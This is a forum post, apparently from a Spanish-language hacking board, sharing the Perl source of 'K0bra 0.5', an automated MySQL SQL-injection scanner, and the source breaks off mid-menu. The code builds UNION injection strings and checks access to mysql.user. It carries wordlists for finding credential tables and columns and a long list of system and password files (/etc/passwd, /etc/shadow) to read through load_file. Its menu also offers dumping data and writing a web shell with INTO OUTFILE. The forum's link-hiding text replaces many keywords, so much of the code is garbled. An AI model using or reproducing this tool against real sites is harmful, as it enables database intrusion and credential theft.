comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Perl] K0bra 0.5

  • 1 Respuestas
  • 2116 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Julio 03, 2011, 09:46:20 pm »
Bueno esta es la nueva version de un scanner sqli que habia hecho ,
le arregle varios errores y agregue algunas cosas

Código: Perl
  1. #!usr/bin/perl
  2. #k0bra 0.5
  3. #Automatic SQL Scanner for MYSQL
  4. #(c)0ded By Doddy H
  5. #
  6. #
  7. #C:\Users\DoddyH>perl k0bra.pl http://127.0.0.1/sql.php?id= --
  8. #
  9. #
  10. #
  11. #
  12. # @      @@   @
  13. #@@     @  @ @@
  14. # @ @@  @  @  @ @   @ @ @@@
  15. # @ @   @  @  @@ @ @@@ @  @
  16. # @@    @  @  @  @  @   @@@
  17. # @ @   @  @  @  @  @  @  @
  18. #@@@ @   @@   @@@  @@@ @@@@@
  19. #
  20. #
  21. #
  22. #
  23. #[Status] : Scanning.....
  24. #[Status] : Enjoy the menu
  25. #
  26. #[Target confirmed] : http://127.0.0.1/sql.php?id=-1+union+select+hackman,2,3
  27. #[Bypass] : --
  28. #
  29. #
  30. #
  31. #--== information_schema.tables ==--
  32. #
  33. #[1] : Show tables
  34. #[2] : Show columns
  35. #[3] : Show DBS
  36. #[4] : Show tables witg other DB
  37. #[5] : Show columns with other DB
  38. #
  39. #
  40. #--== mysql.user ==--
  41. #
  42. #[6] : Show users
  43. #
  44. #
  45. #--== Others ==--
  46. #
  47. #[7] : Fuzzing tables
  48. #[8] : Fuzzing columns
  49. #[9] : Fuzzing files with load_file
  50. #[10] : Dump
  51. #[11] : Informacion of the server
  52. #[12] : Create a shell with into outfile
  53. #[13] : Show Log
  54. #[14] : Exit
  55. #
  56. #
  57. #[Option] : Enjoy this program xDDDDD
  58. #
  59.  
  60. You are not allowed to view links. Register or Login('cls');
  61. You are not allowed to view links. Register or Login ("title k0bra");
  62.  
  63.  
  64.  
  65. @buscar1 =('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario','web_users','name','names','nombre','nombres','usuarios','member','members','admin_table','usuaris','web_usuarios','miembro','miembros','membername','admins','administrator','sign','config','USUARIS','cms_operadores','administrators','passwd','password','passwords','pass','Pass','mpn_authors','author','musuario','mysql.user','user_names','foro','tAdmin','tadmin','user_password','user_passwords','user_name','member_password','mods','mod','moderators','moderator','user_email','jos_users','mb_user','host','apellido_nombre','user_emails','user_mail','user_mails','mail','emails','email','address','jos_usuarios','tutorial_user_auth','e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','tbl_usuarios','user_auth','login_radio','registers','register','usr','usrs','ps','pw','un','u_name','u_pass','tbl_admin','usuarios_head','tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','BG_CMS_Users','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id','foro_usuarios','cliente','sistema_usuario','sistema_password','contrasena','auth','key','senha','signin','dir_admin','alias','clientes','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','calendar_users','cursos','tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','curso','membros','utilizadores','staff','nuke_authors','accounts','account','accnts','signup','leads','lead','associated','accnt','customers','customer','membres','administrateur','utilisateur','riacms_users','tuser','tusers','utilisateurs','amministratore','god','God','authors','wp_users','tb_usuarios','asociado','asociados','autores','autor','Users','Admin','Members','tb_usuario','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO','USR_NAME','about','access','admin_id','admin_name','admin_pass','admin_passwd','admin_password','admin_pwd','admin_user','admin_userid','admin_username','adminemail','adminid','administrator_name','adminlogin','adminmail','adminname','adminuser','adminuserid','adminusername','aid','aim','apwd','auid','authenticate','authentication','blog','cc_expires','cc_number','cc_owner','cc_type','cfg','cid','clientname','clientpassword','clientusername','conf','contact','converge_pass_hash','converge_pass_salt','crack','customers_email_address','customers_password','cvvnumber]','data','db_database_name','db_hostname','db_password','db_username','download','e_mail','emer','emni','emniplote','emri','fjalekalimi','fjalekalimin','full','gid','group','group_name','hash','hashsalt','homepage','icq','icq_number','id','id_group','id_member','images','ime','index','ip_address','kodi','korisnici','korisnik','kpro_user','last_ip','last_login','lastname','llogaria','login_admin','login_name','login_pass','login_passwd','login_password','login_pw','login_pwd','login_user','login_username','logini','loginkey','loginout','logo','logohu','lozinka','md5hash','mem_login','mem_pass','mem_passwd','mem_password','mem_pwd','member_id','member_login_key','member_name','memberid','memlogin','mempassword','my_email','my_name','my_password','my_username','myname','mypassword','myusername','nc','new','news','number','nummer','p_assword','p_word','pass_hash','pass_w','pass_word','pass1word','passw','passwordsalt','passwort','passwrd','perdorimi','perdoruesi','personal_key','phone','privacy','psw','punetoret','punonjes','pword','pwrd','salt','search','secretanswer','secretquestion','serial','session_member_id','session_member_login_key','sesskey','setting','sid','sifra','spacer','status','store','store1','store2','store3','store4','table_prefix','temp_pass','temp_password','temppass','temppasword','text','uid','uname','user_admin','user_icq','user_id','user_ip','user_level','user_login','user_n','user_pass','user_passw','user_passwd','user_pw','user_pwd','user_pword','user_pwrd','user_un','user_uname','user_username','user_usernm','user_usernun','user_usrnm','user1','useradmin','userid','userip','userlogin','usern','usernm','userpass','userpassword','userpw','userpwd','usr_n','usr_name','usr_pass','usr2','usrn','usrnam','usrname','usrnm','usrpass','warez','xar_name','xar_pass','nom dutilisateur','mot de passe','compte','comptes','aide','objectif','authentifier','authentification','Contact','fissure','client','clients','de donn?es','mot_de_passe_bdd','t?l?charger','E-mail','adresse e-mail','Emer','complet','groupe','hachage','Page daccueil','Kodi','nom','connexion','membre','MEMBERNAME','mon_mot_de_passe','monmotdepasse','ignatiusj','caroline-du-nord','nouveau','Nick','passer','Passw','Mot de passe','t?l?phone','protection de la vie priv?e','PSW','pWord','sel','recherche','de s?rie','param?tre','?tat','stocker','texte','cvvnumber');
  66.  
  67. @buscar2 = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email','senha','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail','cliente','usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','host','pws','cedula','userName','host_password','chave','alias','apellido_nombre','cliente_nombre','cliente_email','cliente_pass','cliente_user','cliente_usuario','login_id','sistema_id','author','user_login','admin_user','admin_pass','uh_usuario','uh_password','psw','host_username','sistema_usuario','auth','key','usuarios_nombre','usuarios_nick','usuarios_password','user_clave','membername','nme','unme','password','user_password','autores','pass_hash','hash','pass','correo','usuario_nombre','usuario_nick','usuario_password','userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors','user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username','tbladmins','sort','_wfspro_admin','4images_users','a_admin','account','accounts','adm','admin','admin_login','admin_userinfo','administer','administrable','administrate','administration','administrator','administrators','adminrights','admins','adminuser','art','article_admin','articles','artikel','ÃÜÂë','aut','autore','backend','backend_users','backenduser','bbs','book','chat_config','chat_messages','chat_users','client','clients','clubconfig','company','config','contact','contacts','content','control','cpg_config','cpg132_users','customer','customers','customers_basket','dbadmins','dealer','dealers','diary','download','Dragon_users','e107.e107_user','e107_user','forum.ibf_members','fusion_user_groups','fusion_users','group','groups','ibf_admin_sessions','ibf_conf_settings','ibf_members','ibf_members_converge','ibf_sessions','icq','images','index','info','ipb.ibf_members','ipb_sessions','joomla_users','jos_blastchatc_users','jos_comprofiler_members','jos_contact_details','jos_joomblog_users','jos_messages_cfg','jos_moschat_users','jos_users','knews_lostpass','korisnici','kpro_adminlogs','kpro_user','links','login_admin','login_admins','login_user','login_users','logins','logs','lost_pass','lost_passwords','lostpass','lostpasswords','m_admin','main','mambo_session','mambo_users','manage','manager','mb_users','member','memberlist','members','minibbtable_users','mitglieder','movie','movies','mybb_users','mysql','mysql.user','names','news','news_lostpass','newsletter','nuke_authors','nuke_bbconfig','nuke_config','nuke_popsettings','nuke_users','Óû§','obb_profiles','order','orders','parol','partner','partners','passes','passwords','perdorues','perdoruesit','phorum_session','phorum_user','phorum_users','phpads_clients','phpads_config','phpbb_users','phpBB2.forum_users','phpBB2.phpbb_users','phpmyadmin.pma_table_info','pma_table_info','poll_user','punbb_users','pwds','reg_user','reg_users','registered','reguser','regusers','session','sessions','settings','shop.cards','shop.orders','site_login','site_logins','sitelogin','sitelogins','sites','smallnuke_members','smf_members','SS_orders','statistics','superuser','sysadmins','system','sysuser','sysusers','table','tables','tb_admin','tb_administrator','tb_login','tb_member','tb_members','tb_user','tb_username','tb_usernames','tb_users','tbl','tbl_user','tbl_users','tbluser','tbl_clients','tbl_client','tblclients','tblclient','test','usebb_members','user_admin','user_info','user_list','user_logins','user_names','usercontrol','userinfo','userlist','userlogins','usernames','userrights','users','vb_user','vbulletin_session','vbulletin_user','voodoo_members','webadmin','webadmins','webmaster','webmasters','webuser','webusers','x_admin','xar_roles','xoops_bannerclient','xoops_users','yabb_settings','yabbse_settings','ACT_INFO','ActiveDataFeed','Category','CategoryGroup','ChicksPass','ClickTrack','Country','CountryCodes1','CustomNav','DataFeedPerformance1','DataFeedPerformance2','DataFeedPerformance2_incoming','DataFeedShowtag1','DataFeedShowtag2','DataFeedShowtag2_incoming','dtproperties','Event','Event_backup','Event_Category','EventRedirect','Events_new','Genre','JamPass','MyTicketek','MyTicketekArchive','News','PerfPassword','PerfPasswordAllSelected','Promotion','ProxyDataFeedPerformance','ProxyDataFeedShowtag','ProxyPriceInfo','Region','SearchOptions','Series','Sheldonshows','StateList','States','SubCategory','Subjects','Survey','SurveyAnswer','SurveyAnswerOpen','SurveyQuestion','SurveyRespondent','sysconstraints','syssegments','tblRestrictedPasswords','tblRestrictedShows','TimeDiff','Titles','ToPacmail1','ToPacmail2','UserPreferences','uvw_Category','uvw_Pref','uvw_Preferences','Venue','venues','VenuesNew','X_3945','tblArtistCategory','tblArtists','tblConfigs','tblLayouts','tblLogBookAuthor','tblLogBookEntry','tblLogBookImages','tblLogBookImport','tblLogBookUser','tblMails','tblNewCategory','tblNews','tblOrders','tblStoneCategory','tblStones','tblUser','tblWishList','VIEW1','viewLogBookEntry','viewStoneArtist','vwListAllAvailable','CC_info','CC_username','cms_user','cms_users','cms_admin','cms_admins','jos_user','table_user','bulletin','cc_info','login_name','admuserinfo','userlistuser_list','SiteLogin','Site_Login','UserAdmin','Admins','Login','Logins');
  68.  
  69.  
  70. @buscar3 =('c:/xampp/log.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog');
  71.  
  72. use LWP::UserAgent;
  73. use HTTP::Request;
  74. use HTTP::Request::Common;
  75. use URI::Split You are not allowed to view links. Register or Login(uri_split);
  76.  
  77. my $nave = LWP::UserAgent->new();
  78. $nave->timeout(5);
  79. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  80.  
  81. &head;
  82. unless(@ARGV == 2) {
  83. &menu;
  84. } else {
  85. &scan($ARGV[0],$ARVG[1]);
  86. }
  87. &finish;
  88.  
  89. sub menu {
  90. You are not allowed to view links. Register or Login "[Page] : ";
  91. You are not allowed to view links. Register or Login(my $page=<STDIN>);
  92. You are not allowed to view links. Register or Login "\n[Bypass : -- /* %00] : ";
  93. You are not allowed to view links. Register or Login(my $bypass = <STDIN>);
  94. You are not allowed to view links. Register or Login "\n\n";
  95. &scan($page,$bypass);
  96. }
  97.  
  98. sub scan {
  99. You are not allowed to view links. Register or Login "[Status] : Scanning.....\n";
  100. $pass = &bypass($_[1]);
  101. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  102. my $save = $auth;
  103. if ($_[0]=~/hackman/ig) {
  104. savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
  105. &menu_options($_[0],$pass,$save);
  106. }
  107. my ($gen,$save,$control) = &You are not allowed to view links. Register or Login($_[0],$_[1]);
  108. if ($control eq 1) {
  109. You are not allowed to view links. Register or Login "[Status] : Enjoy the menu\n\n";
  110. &menu_options($gen,$pass,$save);
  111. } else {
  112. You are not allowed to view links. Register or Login $control;
  113. You are not allowed to view links. Register or Login "[Status] : Length columns not found\n\n";
  114. <STDIN>;
  115. &head;
  116. &menu;
  117. }
  118. }
  119.  
  120. sub head {
  121. You are not allowed to view links. Register or Login 'cls';
  122. You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login(
  123.  
  124.  
  125.  @      @@   @            
  126. @@     @  @ @@            
  127.  @ @@  @  @  @ @   @ @ @@@
  128.  @ @   @  @  @@ @ @@@ @  @
  129.  @@    @  @  @  @  @   @@@
  130.  @ @   @  @  @  @  @  @  @
  131. @@@ @   @@   @@@  @@@ @@@@@
  132.  
  133.  
  134.  
  135.  
  136. );
  137. }
  138.  
  139.  
  140.  
  141.  
  142. sub copyright {
  143. You are not allowed to view links. Register or Login "\n\n\n\n(C) Doddy Hackman 2010\n\n";
  144. }
  145.  
  146.  
  147. sub toma {
  148. You are not allowed to view links. Register or Login $nave->request (GET $_[0])->content;
  149. }
  150.  
  151.  
  152. sub savefile {
  153. You are not allowed to view links. Register or Login (SAVE,">>logs/webs/".$_[0]);
  154. You are not allowed to view links. Register or Login SAVE $_[1]."\n";
  155. You are not allowed to view links. Register or Login SAVE;
  156. }
  157.  
  158. sub finish {
  159. You are not allowed to view links. Register or Login "\n\n\n(C) Doddy Hackman 2010\n\n";
  160. <STDIN>;
  161. You are not allowed to view links. Register or Login(1);
  162. }
  163.  
  164.  
  165. sub You are not allowed to view links. Register or Login {
  166. my $rows  = "0";
  167. my $asc;
  168. my $page = $_[0];
  169. ($pass1,$pass2) = &bypass($_[1]);
  170. $inyection = $page."1".$pass1."and".$pass1."1=0".$pass1."order".$pass1."by"."9999999999".$pass2;
  171. $code = toma($inyection);
  172. if($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
  173. $code1 = toma($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1."666".$pass2);
  174. if ($code1=~/The used SELECT statements have a different number of columns/ig) {
  175. my $patha = $1;
  176. You are not allowed to view links. Register or Login $patha;
  177. $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
  178. $total = "1";
  179. for my $rows(2..200) {
  180. $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
  181. $total.= ",".$rows;
  182. $injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
  183. $test = toma($injection);
  184. if ($test=~/RATSXPDOWN/) {
  185. @number = $test =~You are not allowed to view links. Register or Login{RATSXPDOWN(\d+)RATSXPDOWN}g;
  186. $control = 1;
  187. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  188. my $save = $auth;
  189. savefile($save.".txt","\n[Target confirmed] : $page");
  190. savefile($save.".txt","[Bypass] : $_[1]\n");
  191. savefile($save.".txt","[Limit] : The site has $rows columns");
  192. savefile($save.".txt","[Data] : The number @number print data");
  193. if ($patha) {
  194. savefile($save.".txt","[Full Path Discloure] : $patha");
  195. }
  196. $total=~You are not allowed to view links. Register or Login/$number[0]/hackman/;
  197. savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
  198. You are not allowed to view links. Register or Login($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
  199. }
  200. }
  201. }
  202. }
  203.  
  204. sub bypass {
  205. if ($_[0] eq "/*") { You are not allowed to view links. Register or Login ("/**/","/*"); }
  206. elsif ($_[0] eq "%20") { You are not allowed to view links. Register or Login ("%20","%00"); }
  207. else {You are not allowed to view links. Register or Login ("+","--");}}
  208.  
  209. sub ascii {
  210. You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login ',',You are not allowed to view links. Register or Login "U*",$_[0];
  211. }
  212.  
  213. sub ascii_de {
  214. $_[0] = You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login[], You are not allowed to view links. Register or Login { You are not allowed to view links. Register or Login } You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login[,],$_[0];
  215. You are not allowed to view links. Register or Login $_[0];
  216. }
  217.  
  218. sub details {
  219. my ($page,$bypass,$save) = @_;
  220. ($pass1,$pass2) = &bypass($bypass);
  221. savefile($save.".txt","\n");
  222. if ($page=~/(.*)hackman(.*)/ig) {
  223. You are not allowed to view links. Register or Login "\n\n[+] Searching information..\n\n";
  224. my  ($start,$end) = ($1,$2);
  225. $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
  226. $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
  227. $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  228. $test1 = toma($inforschema);
  229. $test2 = toma($mysqluser);
  230. if ($test2=~/ERTOR854/ig) {
  231. savefile($save.".txt","[mysql.user] : ON");
  232. You are not allowed to view links. Register or Login "[mysql.user] : ON\n";
  233. } else {
  234. You are not allowed to view links. Register or Login "[mysql.user] : OFF\n";
  235. savefile($save.".txt","[mysql.user] : OFF");
  236. }
  237. if ($test1=~/ERTOR854/ig) {
  238. You are not allowed to view links. Register or Login "[information_schema.tables] : ON\n";
  239. savefile($save.".txt","[information_schema.tables] : ON");
  240. } else {
  241. You are not allowed to view links. Register or Login "[information_schema.tables] : OFF\n";
  242. savefile($save.".txt","[information_schema.tables] : OFF");
  243. }
  244. if ($test3=~/ERTOR854/ig) {
  245. You are not allowed to view links. Register or Login "[+] load_file permite ver los archivos\n";
  246. savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  247. }
  248. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
  249. $injection = $start.$concat.$end.$pass2;
  250. $code = toma($injection);
  251. if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
  252. You are not allowed to view links. Register or Login "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
  253. savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
  254. } else {
  255. You are not allowed to view links. Register or Login "\n[-] Not found any data\n";
  256. }
  257. }
  258. }
  259. }
  260.  
  261. sub menu_options {
  262. You are not allowed to view links. Register or Login "[Target confirmed] : $_[0]\n";
  263. You are not allowed to view links. Register or Login "[Bypass] : $_[1]\n\n";
  264.  
  265. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  266. my $save = $auth;
  267. You are not allowed to view links. Register or Login "[save] : /logs/webs/$save\n\n";
  268. You are not allowed to view links. Register or Login "\n\n--== information_schema.tables ==--\n\n";
  269. You are not allowed to view links. Register or Login "[1] : Show tables\n";
  270. You are not allowed to view links. Register or Login "[2] : Show columns\n";
  271. You are not allowed to view links. Register or Login "[3] : Show DBS\n";
  272. You are not allowed to view links. Register or Login "[4] : Show tables with other DB\n";
  273. You are not allowed to view links. Register or Login "[5] : Show columns with other DB\n";
  274. You are not allowed to view links. Register or Login "\n\n--== mysql.user ==--\n\n";
  275. You are not allowed to view links. Register or Login "[6] : Show users\n";
  276. You are not allowed to view links. Register or Login "\n\n--== Others ==--\n\n";
  277. You are not allowed to view links. Register or Login "[7] : Fuzzing tables\n";
  278. You are not allowed to view links. Register or Login "[8] : Fuzzing columns\n";
  279. You are not allowed to view links. Register or Login "[9] : Fuzzing files with load_file\n";
  280. You are not allowed to view links. Register or Login "[10] : Dump\n";
  281. You are not allowed to view links. Register or Login "[11] : Informacion of the server\n";
  282. You are not allowed to view links. Register or Login "[12] : Create a shell with into outfile\n";
  283. You are not allowed to view links. Register or Login "[13] : Show Log\n";
  284. You are not allowed to view links. Register or Login "[14] : Change Target\n";
  285. You are not allowed to view links. Register or Login "[15] : Exit\n";
  286. You are not allowed to view links. Register or Login "\n\n[Option] : ";
  287. You are not allowed to view links. Register or Login(my $opcion = <STDIN>);
  288. if ($opcion eq "1") {
  289. schematables($_[0],$_[1],$save);
  290. &reload;       
  291. }
  292. elsif ($opcion eq "2") {
  293. You are not allowed to view links. Register or Login "\n\n[Tabla] : ";
  294. You are not allowed to view links. Register or Login(my $tabla = <STDIN>);
  295. schemacolumns($_[0],$_[1],$save,$tabla);
  296. &reload;
  297. }
  298. elsif ($opcion eq "3") {
  299. &schemadb($_[0],$_[1],$save);
  300. &reload;
  301. }
  302. elsif ($opcion eq "4") {
  303. You are not allowed to view links. Register or Login "\n\n[DAtabase] : ";
  304. You are not allowed to view links. Register or Login(my $data =<STDIN>);
  305. &schematablesdb($_[0],$_[1],$data,$save);
  306. &reload;
  307. }
  308. elsif ($opcion eq "5"){
  309. You are not allowed to view links. Register or Login "\n\n[DB] : ";
  310. You are not allowed to view links. Register or Login(my $db =<STDIN>);
  311. You are not allowed to view links. Register or Login "\n[Table] : ";
